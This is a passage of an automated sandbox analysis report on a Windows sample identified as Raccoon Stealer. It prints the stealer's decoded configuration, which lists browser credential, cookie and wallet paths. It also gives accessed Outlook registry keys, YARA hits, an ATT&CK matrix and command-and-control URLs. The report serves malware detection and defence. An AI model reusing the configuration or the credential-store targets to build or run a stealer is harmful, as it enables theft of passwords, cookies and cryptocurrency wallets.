Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Must
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp	String found in binary or memory: {"_id":"45FBKXwB3dP17SpzZps0","au":"/l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67","ls":"/l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1","ip":"185.189.150.72","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8001,"latitude":47.3664,"longitude":8.5546},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":0,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Must
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp	String found in binary or memory: {"_id":"45FBKXwB3dP17SpzZps0","au":"/l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67","ls":"/l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1","ip":"185.189.150.72","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8001,"latitude":47.3664,"longitude":8.5546},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":0,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Must
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp	String found in binary or memory: {"_id":"45FBKXwB3dP17SpzZps0","au":"/l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67","ls":"/l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1","ip":"185.189.150.72","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8001,"latitude":47.3664,"longitude":8.5546},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":0,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Must

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Remote Access Functionality:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection11	Obfuscated Files or Information3	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel21	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing22	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Screen Capture1	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Timestomp1	NTDS	System Information Discovery36	Distributed Component Object Model	Email Collection1	Scheduled Transfer	Application Layer Protocol115	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion1	LSA Secrets	Security Software Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Virtualization/Sandbox Evasion1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion1	DCSync	Process Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection11	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	34%	Virustotal		Browse
SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	38%	ReversingLabs	Win32.Trojan.DllCheck
SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\LocalLow\sqlite3.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll	3%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.1.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File
1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1139893		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignCA.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
https://repository.luxtrust.lu0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html0	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://crl.securetrust.com/SGCA.crl0	0%	URL Reputation	safe
http://crl.securetrust.com/STCA.crl0	0%	URL Reputation	safe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	0%	URL Reputation	safe
http://185.138.164.150/;r	0%	Avira URL Cloud	safe
http://www.certplus.com/CRL/class2.crl0	0%	URL Reputation	safe
https://ocsp.quovadisoffshore.com0	0%	URL Reputation	safe
http://185.138.164.150//l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67	0%	Avira URL Cloud	safe
http://cps.chambersign.org/cps/chambersignroot.html0	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://ocsp.accv.es0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
https://www.catcert.net/verarrel	0%	URL Reputation	safe
http://crl.chambersign.org/chambersignroot.crl0	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe
http://185.138.164.150/	0%	Virustotal		Browse
http://185.138.164.150/	0%	Avira URL Cloud	safe
https://www.catcert.net/verarrel05	0%	URL Reputation	safe
http://www.quovadis.bm0	0%	URL Reputation	safe
http://185.138.164.150//l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1	0%	Avira URL Cloud	safe
http://www.accv.es00	0%	URL Reputation	safe
http://www.pkioverheid.nl/policies/root-policy-G20	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
t.me	149.154.167.99	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.138.164.150//l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67	true	Avira URL Cloud: safe	unknown
http://185.138.164.150/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://t.me/agrybirdsgamerept	false		high
http://185.138.164.150//l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	false		high
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://fedir.comsign.co.il/crl/ComSignCA.crl0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	false		high
http://crl.chambersign.org/chambersroot.crl0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0:	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323052701.0000000002DA0000.00000004.00000001.sdmp	false		high
https://repository.luxtrust.lu0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
https://support.google.com/chrome/answer/6258784	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.305167317.0000000002D36000.00000004.00000001.sdmp, SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327229599.0000000002D2C000.00000004.00000001.sdmp	false		high
http://cps.chambersign.org/cps/chambersroot.html0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
https://telegram.org/img/t_logo.png	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp	false		high
http://www.mozilla.com0	softokn3.dll.1.dr	false	URL Reputation: safe	unknown
http://www.chambersign.org1	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_flash	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.305167317.0000000002D36000.00000004.00000001.sdmp, SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327229599.0000000002D2C000.00000004.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://www.firmaprofesional.com/cps0	nssckbi.dll.1.dr	false		high
http://www.diginotar.nl/cps/pkioverheid0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://repository.swisssign.com/0	nssckbi.dll.1.dr	false		high
http://crl.securetrust.com/SGCA.crl0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://crl.securetrust.com/STCA.crl0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://185.138.164.150/;r	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323065453.0000000002DB2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	softokn3.dll.1.dr	false		high
http://www.certplus.com/CRL/class2.crl0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://www.quovadisglobal.com/cps0	nssckbi.dll.1.dr	false		high
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0	nssckbi.dll.1.dr	false		high
https://ocsp.quovadisoffshore.com0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0de	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323052701.0000000002DA0000.00000004.00000001.sdmp	false		high
http://cps.chambersign.org/cps/chambersignroot.html0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://www.sqlite.org/copyright.html.	sqlite3.dll.1.dr	false		high
http://policy.camerfirma.com0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.1.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	false		high
http://www.accv.es/legislacion_c.htm0U	nssckbi.dll.1.dr	false		high
http://www.certicamara.com/dpc/0Z	nssckbi.dll.1.dr	false		high
http://ocsp.accv.es0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://ocsp.thawte.com0	softokn3.dll.1.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	false		high
https://ac.ecosia.org/autocomplete?q=	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	false		high
https://www.catcert.net/verarrel	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0th	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323052701.0000000002DA0000.00000004.00000001.sdmp	false		high
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	nssckbi.dll.1.dr	false		high
http://crl.chambersign.org/chambersignroot.crl0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://crl.xrampsecurity.com/XGCA.crl0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
https://www.catcert.net/verarrel05	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://www.quovadis.bm0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://www.accv.es00	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://www.pkioverheid.nl/policies/root-policy-G20	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://www.cert.fnmt.es/dpcs/0	nssckbi.dll.1.dr	false		high
